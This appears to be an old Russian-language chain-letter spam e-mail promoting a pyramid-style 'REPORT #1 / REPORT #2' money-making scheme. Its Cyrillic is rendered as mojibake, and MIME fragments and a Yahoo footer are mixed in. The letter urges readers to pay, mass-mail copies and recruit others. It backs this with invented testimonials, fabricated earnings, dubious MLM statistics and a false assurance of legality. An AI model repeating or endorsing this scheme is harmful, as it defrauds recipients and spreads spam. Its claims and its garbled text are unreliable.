áëàãîäàðÿ ïðîãðàììå. Åñëè è òåïåðü Âû íå çíàåòå, ÷òî äåëàòü, òàê ÿ Âàì ãîâîðþ Ï_Î_Ï_Ð_Î_Á_Ó_É_Ò_Å è íå ïîæàëååòå. Ýòî Âàø øàíñ, åñëè åãî óïóñòèòå, òàê áóäåòå æàëåòü îá ýòîì äî êîíöà æèçíè! Í. Ðåáðîâ, Ðîññèÿ. ************************************************************ Ìåíÿ çîâóò Mitchell a ìîÿ æåíà Jody, æèâåì â ×èêàãî. ß áóõãàëòåð â îäíîé àìåðèêàíñêîé ôèðìå è çàðàáàòûâàþ íà æèçíü äîñòàòî÷íî äåíåã. Êîãäà ÿ ïîëó÷èë ýòîò e-mail, ÿ áûë çîë íà æåíó èç-çà ïîëó÷åíèÿ "junk mail" (ðåêëàìíûå ëèñòû, è ò.ä.., áåç ïîæåëàíèÿ). ß ïîñìåÿëñÿ íàä ïðåäëîæåíèåì, ÿ çíàë, ÷òî ýòî íå áóäåò äåéñòâîâàòü. Jody ìåíÿ àáñîëþòíî èãíîðèðîâàëà è íà÷àëà ýòèì çàíèìàòüñÿ. ß øóòèë íàä íåé è áûë ãîòîâ ïðîèçíåñòè èçâåñòíóþ ôðàçó "Âèäèøü, ÿ æå òåáå ãîâîðèë, ÷òî ýòî íå áóäåò äåéñòâîâàòü!" Íî ñìåÿëèñü ïîòîì íàäî ìíîé!!! Çà 45 äíåé îíà ïîëó÷èëà 47.200,- USD. ß áûë â øîêå!!! ß áûë óâåðåí, ÷òî ýòî íå äåéñòâóåò, a ýòî áûëà íåïðàâäà!!! ß ïðèñîåäèíèëñÿ ê Jody, äî ïåíñèè ìíå îñòàâàëîñü ñåìü ëåò, a ýòà ïðîãðàììà âåðíóëà ìíå æåëàíèå ðàáîòàòü, ïîòîìó ÷òî ÿ âèäåë ñâîè ðåçóëüòàòû! Mitchell Wolf, MD, Chicago, IL. ************************************************************ Ãëàâíûì äîâîäîì ýòîãî ïèñüìà ÿâëÿåòñÿ òî, ÷òîáû óáåäèë âàñ, ÷òî ýòî ÷åñòíàÿ, ëåãàëüíàÿ, ïðèáûëüíàÿ ñèñòåìà äëÿ çàðàáàòûâàíèÿ áîëüøèõ äåíåã çà êîðîòêîå âðåìÿ. ß òîëüêî ïîïðîáîâàë, ÷òîáû óçíàòü, ÷òî ìîæíî ïîëó÷èòü âçàìåí çà ìèíèìàëüíûé âêëàä è ñòàðàíèå. Ê ìîåìó óäèâëåíèþ ÿ ïîëó÷èë 3.470,- USD çà ïåðâûõ 14 äíåé à îñòàëüíûå äåíüãè âñå åùå ïðèõîäÿò!!! Charles Morris, Esq. ************************************************************ Òàê êàê ÿ íå ÿâëÿþñü òèïîì àçàðòíîãî èãðîêà, ïðîøëî íåñêîëüêî íåäåëü, ïåðåä òåì êàê ÿ ðåøèë ïîïðîáîâàòü. ß ïðèøåë ê âûâîäó, ÷òî 20,- USD ýòî òàêîé ìàëåíüêèé âêëàä, ÷òî ïðîñòî èñêëþ÷åíî, ÷òîáû ÿ íå íàøåë õîòÿ áû íåñêîëüêî çàêàçîâ, äëÿ âîçâðàòà ñâîåé èíâåñòèöèè. Áîæå, êàê ÿ áûë óäèâëåí, êîãäà óâèäåë ñâîé êîøåëåê, ïîëíûé çàêàçîâ! Çà íåêîòîðîå âðåìÿ èõ ïîñòóïèëî ñòîëüêî, ÷òî ÿ áûë âûíóæäåí âçÿòü îòïóñê íà ðàáîòå. Çà ýòîò ãîä ÿ çàðàáîòàë áîëüøå äåíåã, ÷åì çà ïîñëåäíèå äåñÿòü ëåò! Ñàìîå ïðåêðàñíîå â òîì, ÷òî íåâàæíî ãäå ëþäè æèâóò. Ýòî ïðîñòî - ñàìàÿ ëó÷øàÿ èíâåñòèöèÿ ñ î÷åíü áûñòðûì îáîðîòîì. Paige Willis, Des Moines, IA. ************************************************************ Îäèí ðàç ÿ óæå ïîëó÷èë ýòó ïðîãðàììó. ß åå óäàëèë, íî ïîòîì ÿ ïîäóìàë î òîì, ÷òî ñòîèëî áû ïîïðîáîâàòü. Êîíå÷íî, ÿ íå èìåë ïðåäñòàâëåíèÿ êîãäà ïîëó÷ó îïÿòü ïîäîáíîå ïðåäëîæåíèå, ïîýòîìó ÿ áûë âûíóæäåí æäàòü, ïîêà ìíå êòî-íèáóäü íå ïðèøëåò çàíîâî. Ïðîøëî 11 ìåñÿöåâ êîãäà ÿ ñíîâà ïîëó÷èë åãî. Òåïåðü ÿ åãî íå ñîòðól!!! Ñ ïåðâîãî ðàçà ÿ ïîëó÷èë 41.000,- USD!!!! Violet Wilson, Johnstown, PA. ************************************************************ Ó÷àñòâóþ â ýòîé ïðîãðàììå óæ â òðåòèé ðàç. Ìû óøëè ñ ðàáîòû, à ÷åðåç íåêîòîðîå âðåìÿ êóïèëè ñåáå äîì íà ïëÿæå è áóäåì æèòü íå äóìàÿ î äåíüãàõ. Åñòü òîëüêî îäèí ñïîñîá íà Çåìëå, ÷òîáû çàñòàâèòü èñïîëíÿòüñÿ ñâîè ïëàíû - ÝÒÎ ÍÀ×ÀÒÜ ÂÛÏÎËÍßÒÜ ÈÕ. Ðàäè Áîãà, íå ïðîïóñòèòå ýòó ÇÎËÎÒÓÞ âîçìîæîñòü!!! Ìíîãî ñ÷àñòüÿ è ïðèÿòíîé òðàòû äåíåã! Kerry Ford, Centerport, NY. ************************************************************ ÇÀÊÀÆÈÒÅ ÑÅÁÅ REPORT`s ÏÐßÌÎ ÑÅÉ×ÀÑ È ÂÑÒÀÂÀÉÒÅ ÍÀ ÏÓÒÜ Ê ÍÅÇÀÂÈÑÈÌÎÑÒÈ, ÑÂÎÁÎÄÅ È Ñ×ÀÑÒÜÞ! ÒÅÏÅÐÜ ÂÐÅÌß ÍÀ ÄÎÑÒÈÆÅÍÈÅ ÎÃÐÎÌÍÛÕ ÐÅÇÓËÜÒÀÒÎÂ!! ÏÎÆÀËÓÉÑÒÀ ÂÍÈÌÀÍÈÅ: Åñëè âàì íóæåí ñîâåò êàê íà÷àòü ïðåäïðèíèìàòü, çàðåãèñòðèðîâàòü òîðãîâîå íàçâàíèå, íàó÷èòüñÿ ïëàòèòü íàëîãè, êîíòàêòèðóéòå ñ îòäåëîì ïðåäïðèíèìàòåëüñòâà. Âàøè ðåçóëüòàòû çàâèñÿò òîëüêî îò Âàñ, îò Âàøåé ðàáîòû. Ýòî ïèñüìî íå ãàðàíòèðóåò íèêàêèõ äîõîäîâ è íèêàêèõ ðåçóëüòàòîâ, íî âñå ñóììû è ðåçóëüòàòû, óêàçàííûå â ýòîì äîêóìåíòå -- ÔÀÊÒ. !!!ÂÑÅ ÇÀÂÈÑÈÒ ÒÎËÜÊÎ ÎÒ ÂÀÑ!!! ÁÎËÜØÎÃÎ ÓÑÏÅÕÀ!!! P.S. Âû ñìîæåòå ñâÿçàòüñÿ ñî ìíîé ïî àäðåñó: WM_13@yahoo.com P.S. èëè çàéòè íà ìîþ ñòðàíè÷êó : http://www.geocities.com/wm_13/ C óâàæåíèåì, Ìèõàèë. geovisit(); geovisit(); --------------------------------- Do You Yahoo!? Yahoo! Mail Personal Address - Get email at your own domain with Yahoo! Mail. --0-2086206725-986370454=:7069 Content-Type: text/html; charset=us-ascii ÍÅ ÓÄÀËßÉÒÅ ÝÒÎ, ÎÒÏÅ×ÀÒÀÉÒÅ ÝÒÎ, ÏÐÎ×ÈÒÀÉÒÅ ÝÒÎ

ÎÒÏÅ×ÀÒÀÉÒÅ ÝÒÎ, ÏÎÆÀËÓÉÑÒÀ, È ÑÏÎÊÎÉÍÎ ÏÐÎ×ÈÒÀÉÒÅ !

ÂÛ ÇÀÐÀÁÎÒÀÅÒÅ ÌÍÎÃÎ ÄÅÍÅÃ!

ÝÒÎÒ ÁÈÇÍÅÑ ÐÀÁÎÒÀÅÒ ÏÐÎÑÒÎ ÂÅËÈÊÎËÅÏÍÎ!!!

ß ÐÀÁÎÒÀÞ ÏÎ ÝÒÎÉ ÏÐÎÃÐÀÌÌÅ ÎÄÈÍ - ÄÂÀ ×ÀÑÀ  ÄÅÍÜ, ÂÊËÞ×Àß ÎÁÐÀÁÎÒÊÓ ÇÀÊÀÇÎÂ È ÄÎÐÎÃÓ Â ÁÀÍÊ!!!

Íà÷íèòå ðàáîòàòü ñ íàìè è óâèäèòå, ÷òî áóäåòå ðàäû òîìó, ÷òî òàê ñäåëàëè!!!

ÇÀÐÀÁÎÒÀÉÒÅ 100.000,- USD ÇÀ ÃÎÄ ÍÀ ÐÅÊËÀÌÅ Â ÈÍÒÅÐÍÅÒÅ È ÐÀÑÑÛËÊÅ E-MAIL!!!

Óâàæàåìûå äðóçüÿ è ïîäðóãè,

Âû ìîæåòå çàðàáîòàòü 50.000,- USD è áîëüøå â òå÷åíèå ñëåäóþùèõ 90 äíåé íà ðàññûëêå e-mail. ÊÀÆÅÒÑß ÍÅÂÎÇÌÎÆÍÛÌ?? Ïðî÷èòàéòå äåòàëè, â ýòîì íåò íèêàêîé êàâåðçû èëè îáìàíà, ïðîñòî äåëàéòå ñåáå ðåêëàìó â Èíòåðíåò, ðàññûëàéòå e-mail è ðàçìåùàéòå ðåêëàìíûå îáúÿâëåíèÿ, è ÂÛ âñòàíåòå íà ïóòü ê ôèíàíñîâîé íåçàâèñèìîñòè è ÑÂÎÁÎÄÅ!!

"AS SEEN ON NATIONAL TELEVISION"

Ñïàñèáî çà Âàøå âðåìÿ è èíòåðåñ. Îá ýòîì ïèñüìå íåäàâíî áûëî íàïèñàíî â àìåðèêàíñêèõ ãàçåòàõ. Òàêæå, ââèäó åãî ïîïóëÿðíîñòè â Èíòåðíåòå, ãëàâíàÿ íî÷íàÿ èíôîðìàöèîííàÿ ïðîãðàììà ïîñâåòèëà åìó öåëóþ ïåðåäà÷ó íà îáúÿñíåíèå è âûÿñíåíèå, äåéñòâèòåëüíî ëè íèæå îïèñàííàÿ ïðîãðàììà ìîæåò ïðèíåñòè ëþäÿì äåíüãè. Òàêæå ïðîâåäåíî èññëåäîâàíèå ëåãàëüíîñòè äàííîé ïðîãðàììû.  ðåçóëüòàòå êîòîðîãî, ðàç è íàâñåãäà ïîäòâåðäèëîñü, ÷òî íå íàðóøàþòñÿ íèêàêèå çàêîíû è ïîñòàíîâëåíèÿ. Ýòî ïîìîãëî ïîêàçàòü ëþäÿì, ÷òî ýòî ïðîñòîé, áåçâðåäíûé è èíòåðåñíûé ñïîñîá çàðàáîòêà äåíåã íà äîìó. Âû ïîéìåòå ñóòü, êàê òîëüêî ïðî÷èòàåòå ýòî ðóêîâîäñòâî.

 

 

Íàïå÷àòàéòå ýòîò äîêóìåíò ñåé÷àñ, äëÿ ïîñëåäóþùåãî ÷òåíèÿ.

(Èíôîðìàöèÿ òðåáóåò âíèìàòåëüíîãî ïðî÷òåíèÿ)

Ñëåäóþùàÿ âîçìîæíîñòü, ïðèíîñèò äîõîä , è ìîæåò Âàñ çàèíòåðåñîâàòü.

Åñòü âîçìîæíîñòü åå íà÷àòü ñ ìèíèìàëüíûìè èíâåñòèöèÿìè, à äîõîä ïðîñòî ÏÎÐÀÇÈÒÅËÜÍÛÉ!!!!!

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

Õîòèòå çàðàáîòàòü 50.000,- USD ìåíüøå ÷åì çà 90 äíåé!? Ïîæàëóéñòà, ïðî÷èòàéòå äàííóþ ïðîãðàììó, ñíà÷àëà ÿ ýòîìó òîæå íå âåðèë, îäíàêî ýòî òàê!!!

À ïîòîì ïðî÷èòàéòå ýòî ÅÙÅ ÐÀÇ!

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

ÝÒÎ ËÅÃÀËÜÍÀß ÂÎÇÌÎÆÍÎÑÒÜ ÇÀÐÀÁÎÒÀÒÜ ÄÅÍÜÃÈ !!! !!!

Ýòî íå òðåáóåò, ÷òîáû âû âñòðå÷àëèñü ñ ëþäüìè (êàê âî ìíîãèõ äðóãèõ ïîäîáíûõ ïðåäëîæåíèÿõ)!!! Ìîæåòå ðàáîòàòü ñâîèì òåìïîì. Ñàìîå ëó÷øåå ýòî òî, ÷òî íåò íåîáõîäèìîñòè ïîêèäàòü ñâîé äîì. Åñëè âû âåðèòå, ÷òî êîãäà-íèáóäü, â îäèí ïðåêðàñíûé äåíü, ó Âàñ ïîÿâèòüñÿ âîçìîæíîñòü äîëãî îòäûõàòü, òàê ýòo, èìåííî, è åñòü òàêàÿ ÂÎÇÌÎÆÍÎÑÒÜ!!!!!

Ïðîñòî, ñëåäóéòå äàííîé èíñòðóêöèè, è Âàø ñîí èñïîëíèòñÿ. Ýòîò áèçíåñ - Multi-level-E-MAIL òîðãîâëÿ ïî çàêàçàì, ïðîãðàììà äåéñòâóåò ïðåâîñõîäíî íà 100% è êîãäà è ãäå óãîäíî. E-mail ÿâëÿåòñÿ òîðãîâûì èíñòðóìåíòîì áóäóùåãî!!! Èñïîëüçóéòå ýòîò íåêîììåð÷åñêèé ìåòîä ðåêëàìû. Ñäåëàéòå ýòî ñåé÷àñ!!! ×åì äîëüøå áóäåòå æäàòü, òåì áîëüøå ëþäåé áóäåò äåëàòü ýòîò áèçíåññ. Âîçüìèòå ñåáå ÷àñòü ÝÒÎÉ ÀÊÖÈÈ!! MULTI-LEVEL-MARKETING (MLM) íàêîíåö-òî äîñòèã óâàæåíèÿ. Îí ïðåïîäàåòñÿ â Ãàðâàðäñêîé òîðãîâîé øêîëå. Ñòýíôîðäñêèé èññëåäîâàòåëüñêèé èíñòèòóò è æóðíàë Wall Street çàÿâèëè, ÷òî 50-65% âñåõ òîâàðîâ è óñëóã äî êîíöà òûñÿ÷åëåòèÿ áóäóò ïðîäàâàòüñÿ ïîñðåäñòâîì multi-level ìåòîäîâ. Ýòî ìíîãî ìèëëèàðäíàÿ äîëëàðîâàÿ èíäóñòðèÿ, è òîëüêî èç 500,000 ìèëëèîíåðîâ â ÑØÀ, öåëûõ 20% (100.000 ÷åëîâåê) ñäåëàëè ñâîå ñîñòîÿíèå çà ïîñëåäíèå ïàðó ëåò áëàãîäàðÿ MLM. À åùå, ñòàòèñòèêà ïîêàçûâàåò, ÷òî 45 ÷åëîâåê êàæäûé äåíü ñòàíîâÿòñÿ ìèëëèîíåðàìè áëàãîäàðÿ Multi-Level-Marketing. Âîçìîæíî, ÷òî âû óæå ñëûøàëè èñòîðèþ, êàê Äîíàëüä Òðàìï ëåòîì íàâåñòèë øîó Äåâèäà Ëåòòåðìàíà. Äåâèä ñïðîñèë åãî, ÷òîáû îí äåëàë åñëè áû ïîòåðÿë âñå ñâîå ñîñòîÿíèå è âûíóæäåí áûë íà÷àòü âñå ñ íà÷àëà. Äîíàëüä áåç êîëåáàíèÿ îòâåòèë, ÷òî íàøåë áû õîðîøóþ MLM ôèðìó è íà÷àë ðàáîòàòü. Ïóáëèêà íà÷àëà ñâèñòåòü âûðàæàÿ íåñîãëàñèå. Äîíàëüä ïîñìîòðåë íà çðèòåëüíûé çàë è ñåðüåçíî ïðîèçíåñ: "Áëàãîäàðÿ ýòîìó ÿ çäåñü íàâåðõó, à âû òàì, âíèçó!"

Ñ ñåòåâûì ìàðêåòèíãîì âû èìååòå äâà èñòî÷íèêà ïðèáûëè: Ïðÿìàÿ ïðèáûëü ñ ïðîäàæè, êîòîðóþ ïðîâîäèòå Âû ñàìè è ïðèáûëü ñ îáîðîòà ëþäåé, êîòîðûõ ïðèâåäåòå â áèçíåñ. Áåñêîíå÷íàÿ ïðèáûëü ÿâëÿåòñÿ òàéíîé áîãàòñòâà. Ýòî çíà÷èò îäèí ðàç èíâåñòèðîâàòü âðåìÿ èëè äåíüãè à ïîòîì ïîëó÷àòü äåíüãè ñíîâà è ñíîâà.  ñåòåâîì ìàðêåòèíãå ýòî òàêæå îçíà÷àåò ïîëó÷àòü äåíüãè çà ðàáîòó äðóãèõ.

Ê ñîæàëåíèþ, ïðî÷èòàâ ýòî ïèñüìî âïåðâûå, ÿ ïðàêòè÷åñêè ïðîïóñòèë òàêóþ âîçìîæíîñòü ñêâîçü ïàëüöû, è äàæå íå ñòàë ÷èòàòü äàëüøå, íî âñêîðå ÿ ïåðå÷èòàë âñå çàíîâî. Çàäóìàëñÿ è ïîíÿë âñþ ñèëó ýòîãî ïðåäëîæåíèÿ.

È òåïåðü ÿ áîãàò è ñâîáîäåí. ß ìîãó äóõîâíî ðàçâèâàòüñÿ, îòäûõàòü, íàäî ìíîé íåò ãíåòà íà÷àëüñòâà, ìîåé ñåìüå è ìíå íå ìåøàåò óíèçèòåëüíàÿ áåäíîñòü è áîðüáà çà êóñîê õëåáà, ìåøàÿ ÷åëîâå÷åñêîé æèçíè...

************************************************************

Íàïðèìåð, âîò ÷òî ãîâîðèò ìèñòåð Äæåðè Ïðîêòîð, àìåðèêàíñêèé ìèëëèîíåð.

Äâà ãîäà íàçàä áûëà óïðàçäíåíà ìîÿ äîëæíîñòü â ôèðìå, â êîòîðîé ÿ ðàáîòàë ïîñëåäíèõ ïÿòíàäöàòü ëåò. Ïîñëå íåñêîëüêèõ íåóñïåøíûõ ñîáåñåäîâàíèé ÿ ðåøèë íà÷àòü ñâîé ñîáñòâåííûé áèçíåñ.  òå÷åíèè ïðîøëûõ ëåò ÿ ïðîøåë ìíîãî ôèíàíñîâûõ çàòðóäíåíèé. ß áûë äîëæåí ñâîåé ñåìüå, äðóçüÿì è êðåäèòîðàì áîëåå 35.000,- USD. ß áûë âûíóæäåí çàëîæèòü ñâîé äîì, ÷òîáû ïðîêîðìèòü ñâîþ ñåìüþ è óäåðæàòü ñâîé áèçíåñ.  ÝÒÎÒ ÌÎÌÅÍÒ ïðîèçîøëî íå÷òî âûäàþùååñÿ â ìîåé æèçíè, è ÿ ïèøó äëÿ òîãî, ÷òîáû ïîäåëèòüñÿ îá ýòîì çíàìåíàòåëüíîì ñîáûòèè ñ Âàìè.  ñåðåäèíå äåêàáðÿ 1998 ÿ ïîëó÷èë e-mail ñ ýòîé ïðîãðàììîé. Ïåðåä ýòèì ÿ øåñòü ìåñÿöåâ èñêàë ðàçíûå òîðãîâûå âîçìîæíîñòè. Âñå ïðîãðàììû, êîòîðûå ÿ ïîëó÷èë íå áûëè ýôôåêòèâíûìè (ïî êðàéíåé ìåðå íà ìîé âçãëÿä). Îíè áûëè èëè ñëèøêîì ñëîæíûìè èëè òðåáîâàëè áîëüøèõ èíâåñòèöèé, à ðèñêîâàòü ñâîèì âêëàäîì, ÷òîáû óçíàòü äåéñòâóåò ýòî èëè íåò, ÿ íå õîòåë. Êàê ÿ óæå ãîâîðèë, â äåêàáðå 1998 ÿ ïîëó÷èë ýòó ïðîãðàììó. ß íå õîòåë åå ïîëó÷àòü, ïðîñòî, ïîëó÷èë òàê æå êàê è Âû. Ñïàñèáî Áîãó çà ýòî! ß ïðî÷èòàë ïðîãðàììó íåñêîëüêî ðàç, ïîòîìó ÷òî íå ìîã â íåå ïîâåðèòü, è ïðèíÿëñÿ çà ðàáîòó. ß ìîã èíâåñòèðîâàòü òîëüêî ñòîëüêî äåíåã, ñêîëüêî â äàííûé ìîìåíò áûëî âîçìîæíî. Òàê æå êàê è Âû ÿ áûë ñêåïòè÷åí è íåìíîãî áîÿëñÿ î ëåãàëüíîñòè äàííîé ïðîãðàììû. Ïîñëå èñêëþ÷åíèÿ òîãî, ÷òî ïðîãðàììà ìîæåò áûòü íåëåãàëüíîé, ÿ ñêàçàë ñåáå, ïî÷åìó áû ìíå ýòî íå ïîïðîáîâàòü. Ïîòîì ÿ ïîñëàë îêîëî 10.000 e-mail. Ñòîèëî ìíå ýòî îêîëî 15,- USD çà ìîå âðåìÿ on-line. Ïðåâîñõîäíîå ñâîéñòâî e-mail ñîñòîèò â òîì, ÷òî íå íàäî íè÷åãî ïå÷àòàòü, à íóæíî òîëüêî ïîñûëàòü. Òàê êàê âñå çàêàçû îôîðìëÿþòñÿ ÷åðåç e-mail, òî ìîåé èíâåñòèöèåé áûëî òîëüêî ìîå âðåìÿ, êîòîðîå ÿ ïðîâåë ó êîìïüþòåðà. Ãîâîðþ Âàì êàê ýòî áûëî, íàäåþñü, ÷òî Âàñ ýòî íå ðàçî÷àðóåò, òàê êàê ÿ ïîîáåùàë ñåáå, ÷òî íèêîãî íå îáìàíó, ÷åãî áû ìíå ýòî íå ñòîèëî. Ìåíüøå ÷åì ÷åðåç íåäåëþ ÿ íà÷àë ïîëó÷àòü çàêàçû íà REPORT #1. Äî 13 ÿíâàðÿ 1999 ÿ ïîëó÷èë 26 çàêàçîâ íà REPORT #1. Âàøåé öåëüþ ÿâëÿåòñÿ ïîëó÷èòü ìèíèìàëüíî 20 çàêàçîâ íà REPORT #1  ÒÅ×ÅÍÈÈ ÄÂÓÕ ÍÅÄÅËÜ. ÅÑËÈ ÂÛ ÈÕ ÍÅ ÏÎËÓ×ÈÒÅ, ÏÎØËÅÒÅ ÁÎËÜØÅ ÄÀÍÍÛÕ ÏÐÎÃÐÀÌÌ, ÄËß ÒÎÃÎ ×ÒÎÁÛ ÈÕ ÏÎËÓ×ÈÒÜ! Ìîé øàã ê ïîëó÷åíèþ 50.000,- USD çà 90 äíåé áûë ñäåëàí. Äî 30 ÿíâàðÿ 1999 ÿ ïîëó÷èë 196 çàêàçîâ íà REPORT #2. Âàøåé öåëüþ ÿâëÿåòñÿ ïîëó÷èòü ìèíèìàëüíî 100 çàêàçîâ íà REPORT #2 â òå÷åíèè äâóõ íåäåëü. Åñëè ýòî íå ïîëó÷èòñÿ, òàê ðàññûëàéòå áîëüøå ýòèõ ïðîãðàìì. Êàê òîëüêî äîñòèãíèòå 100 çàêàçîâ íà REPORT #2 òî âñå îñòàëüíîå áóäåò â ïîðÿäêå è Âû òî÷íî ïîëó÷èòå ñâîè 50.000,- USD. Ó ìåíÿ áûëî 196 çàêàçîâ íà REPORT #2, òî åñòü íà 96 áîëüøå ÷åì ìíå áûëî íóæíî. Ïîýòîìó ÿ ñåë è îòäûõàë. Äî 1 ìàðòà 1999 çà ñâîè 10.000 îòîñëàíûõ e-mail ÿ ïîëó÷èë 58.000,- USD è êàæäûé äåíü ïðèõîäèëè íîâûå äåíüãè. ß çàïëàòèë ñâîè äîëãè è êóïèë ñåáå ìàøèíó. Ïîæàëóéñòà, íàéäèòå âðåìÿ è âíèìàòåëüíî ïðî÷èòàéòå ýòó ïðîãðàììó. ÝÒÎ ÍÀÂÑÅÃÄÀ ÈÇÌÅÍÈÒ ÂÀØÓ ÆÈÇÍÜ!!! Ïîìíèòå, ÷òî ýòî íå çàðàáîòàåò, ïîêà âû ýòî íå ïîïðîáóåòå! Ýòà ïðîãðàììà äåéñòâóåò, íî Âû äîëæíû òî÷íî ïðèäåðæèâàòüñÿ ðåêîìåíäàöèé!!

Ñïåöèàëüíîå ïðàâèëî - íå ñòàðàéòåñü âïèñûâàòü Âàøå èìÿ òàì, ãäå ýòî íå íóæíî. Ýòî íå áóäåò äåéñòâîâàòü, à Âû íåäîïîëó÷èòå ìíîãî äåíåã!! Áîëåå òîãî, ïðè èçìåíåíèè äàííûõ ïðîäàâöîâ èíà÷å, ÷åì ýòî óêàçàíî â èíñòðóêöèè íèæå, äàííûé âèä ïðåäïðèíèìàòåëüñòâà ñòàíîâèòñÿ íåëåãàëüíûì. Ñíîâà ïîâòîðÿþ, ÷òî â ñëó÷àå ñîáëþäåíèÿ âñåõ íèæåóêàçàííûõ ðåêîìåíäàöèé, ðå÷ü èäåò î ëåãàëüíîì ïðåäïðèíèìàòåëüñòâå!! Äëÿ òîãî, ÷òîáû âû äîñòèãëè ñâîåé öåëè íåîáõîäèìî ïîëó÷èòü 20 è áîëüøå çàêàçîâ íà REPORT #1 è 100 è áîëüøå íà REPORT #2.  ýòîì ñëó÷àå çàðàáîòàåòå 50.000,- USD (èëè áîëüøå) çà 90 äíåé! ß - ÐÅÀËÜÍÎÅ ÄÎÊÀÇÀÒÅËÜÑÒÂÎ ÒÎÃÎ, ×ÒÎ ÝÒÎ ÍÀ ÑÀÌÎÌ ÄÅËÅ ÄÅÉÑÒÂÓÅÒ!!! Åñëè âû ðåøèëèñü, ÷òî â ýòîé ïðîãðàììå ó÷àñòâîâàòü íå áóäåòå, òàê ìíå âàñ èñêðåííå æàëü. Òàê êàê ýòî ðåàëüíàÿ ïðåâîñõîäíàÿ âîçìîæíîñòü ñ ìèíèìàëüíûì ðèñêîì è èíâåñòèöèÿìè! Åñëè õîòèòå ó÷àñòâîâàòü, ïðèäåðæèâàéòåñü äàííûõ ðåêîìåíäàöèé è áóäåòå íà äîðîãå ê ôèíàíñîâîé íåçàâèñèìîñòè. Åñëè çàíèìàåòåñü ïðåäïðèíèìàòåëüñòâîì èëè õîòèòå íà÷àòü ñâîé ñîáñòâåííûé áèçíåñ, òàê ñ÷èòàéòå ýòî çà õîðîøóþ âîçìîæíîñòü. ß ÝÒÎ ÑÄÅËÀË !!!

Ñ óâàæåíèåì Äæåðè Ïðîêòîð.

 

 

 

ÝÒÎ ÏÎÐÀÇÈÒÅËÜÍÎ!!!

(ËÈ×ÍÀß ÇÀÌÅÒÊÀ ÎÒ ÎÑÍÎÂÀÒÅËß ÝÒÎÉ ÏÐÎÃÐÀÌÌÛ)

************************************************************

Ïåðåä òåì êàê ïðî÷èòàåòå ýòó ïðîãðàììó, âû äîëæíû ïîíÿòü, ÷òî ýòà ëåãàëüíàÿ ïðîãðàììà íå ìîãëà áûëà áûòü ñîçäàíà ëþáèòåëåì. Ïîçâîëüòå ìíå íåìíîãî ðàññêàçàòü î ñåáå. Öåëûõ 10 ëåò ó ìåíÿ áûë ñîáñòâåííûé ðàçâèâàþùèéñÿ áèçíåñ.  1979 ãîäó ìîé áèçíåñ íà÷àë ðóøèòüñÿ. ß äåëàë âñå, ÷òî ìíå äî ýòîãî ïðèíîñèëî óñïåõ, íî áåçóñïåøíî. Íàêîíåö ÿ ïîíÿë, ÷òî ýòî íå èç-çà ìåíÿ, à èç-çà ýêîíîìèêè, êîòîðàÿ íàñ ñîïðîâîæäàëà ñ 1945 ãîäà. Äóìàþ íå íóæíî Âàì îáúÿñíÿòü, êàê ýòî ïîâëèÿëî íà áåçðàáîòèöó â ñòðàíå, ìíîãèå èç Âàñ ýòî çíàþò ïî ñîáñòâåííîìó îïûòó. Ïðèøëî ìíîãî ïàäåíèé è áàíêðîòîâ. Ñðåäíèé êëàññ èñ÷åçàë, òå, êîòîðûå çíàëè ÷òî äåëàþò, ìóäðî èíâåñòèðîâàëè è ïðîäâèíóëèñü âûøå, à òå êòî íå çíàë, ïàäàëè âñå íèæå, â áåäíîòó. Êàê ãîâîðèò èçâåñòíàÿ ïîãîâîðêà: "ÁÎÃÀÒÛÅ ÁÎÃÀÒÅÞÒ, À ÁÅÄÍÛÅ ÁÅÄÍÅÞÒ". Òðàäèöèîííûå ñïîñîáû çàðàáîòêà äåíåã íèêîãäà íå ïîçâîëÿò Âàì âûñîêî ïîäíÿòüñÿ, à èíôëÿöèÿ òîëüêî ýòîìó ïîìîæåò. Ñåé÷àñ âû ïîëó÷èëè ïèñüìî, êîòîðîå ìîæåò äàòü Âàì ôèíàíñîâóþ íåçàâèñèìîñòü íà âñþ Âàøó æèçíü è "ÁÅÇ ÐÈÑÊÀ" è ñ "ÌÈÍÈÌÀËÜÍÛÌÈ ÓÑÈËÈßÌÈ".  ïîñëåäóþùèõ ìåñÿöàõ Âû ñìîæåòå çàðàáîòàòü äåíåã áîëüøå, ÷åì ìîæåòå ñåáå ïðåäñòàâèòü. Íóæíî ïîä÷åðêíóòü, ÷òî ÿ ñ ýòèõ äåíåã íå óâèæó íè öåíòà. Êàê è íèêòî èç ëþäåé, êîòîðûå òåñòèðîâàëè äàííóþ ïðîãðàììó. ß óæå çàðàáîòàë áîëåå 4.000.000,- USD!!! Ïåðåñòàë èñïîëüçîâàòü ýòó ïðîãðàììó ïîñëå òîãî, êàê ïîñëàë 16.000 ïðîãðàìì. Ñåé÷àñ ó ìåíÿ íåñêîëüêî ôèðì, êîòîðûå èçîáðåòàþò ïîäîáíûå ïðîãðàììû. Âûïîëíÿéòå ïðîãðàììó ÒÎ×ÍÎ ÏÎ ÈÍÑÒÐÓÊÖÈÈ!! Íå èçìåíÿéòå åå íèêàêèì îáðàçîì!! Îíà äåéñòâóåò ìàêñèìàëüíî ýôôåêòèâíî èìåííî â ýòîì âèäå. Íå çàáóäüòå ïîñëàòü êîïèþ ýòîé ïðîãðàììû êàæäîìó, êîãî òîëüêî âñïîìíèòå! Îäèí ÷åëîâåê, êîòîðîìó âû ýòî ïîøëåòå ìîæåò ïîñëàòü è 50.000 êîïèé ... à Âàøå èìÿ áóäåò íà êàæäîé èç íèõ!!! Ïîìíèòå, ÷òî ÷åì áîëüøå ïðîãðàìì âû ïîøëåòå, òåì áîëüøå ïîòåíöèàëüíûõ çàêàç÷èêîâ ïðèîáðåòåòå! Òàê ÷òî, äðóçüÿ, ÿ ïðåäîñòàâëÿþ Âàì âîçìîæíîñòü, èíôîðìàöèþ, ìàòåðèàë äëÿ òîãî ÷òîáû âû ïîëó÷èëè ôèíàíñîâóþ íåçàâèñèìîñòü. ÒÅÏÅÐÜ ÝÒÎ ÇÀÂÈÑÈÒ ÒÎËÜÊÎ ÎÒ ÂÀÑ! "ÏÎÄÓÌÀÉÒÅ ÎÁ ÝÒÎÌ" ïåðåä òåì êàê óäàëèòå ýòîò mail, êàê ÷óòü íå ñäåëàë ÿ. Îòâåäèòå ñåáå íåìíîãî âðåìåíè, ïðî÷òèòå è ïî-íàñòîÿùåìó ïîäóìàéòå íàä ýòèì.

